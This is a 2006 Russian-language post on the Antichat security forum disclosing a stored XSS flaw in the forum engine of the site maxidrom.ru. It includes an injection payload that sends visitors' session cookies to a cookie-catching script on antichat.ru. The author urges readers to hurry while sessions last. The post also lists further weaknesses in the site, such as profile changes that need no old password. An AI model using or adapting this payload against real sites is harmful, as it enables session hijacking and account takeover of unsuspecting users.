HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

maxidrom.ru/forum/ активная XSS
  #1  
Старый 30.05.2006, 01:23
Elekt
Banned
Регистрация: 05.12.2005
Сообщений: 982
С нами: 10752806

Репутация: 1202


По умолчанию maxidrom.ru/forum/ активная XSS

Обнаружена активная хсс в движке Максидрома. Нет проверки спаренных ВВ-тегов:

PHP код:
re@re.com ' style='background:url(javascript:document.images.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)
В опере не пашет, в FF не проверял.
Время сессии - сутки. Торопитесь =]


Пара коментов:
- отутствеует всякая проверка на регистрацию
- отсутствует ретрив пароля на мыло(если забыл - твои проблемы)
- можно сменить ЛЮБЫЕ данные в профиле БЕЗ ввода старого пароля, для смены пароля нужно знать старый


Последний раз редактировалось Elekt; 30.05.2006 в 01:25..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Имеем аккаунт на sitecity.ru (активная XSS) _kREveDKo_ Уязвимости 2 30.05.2006 00:24



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.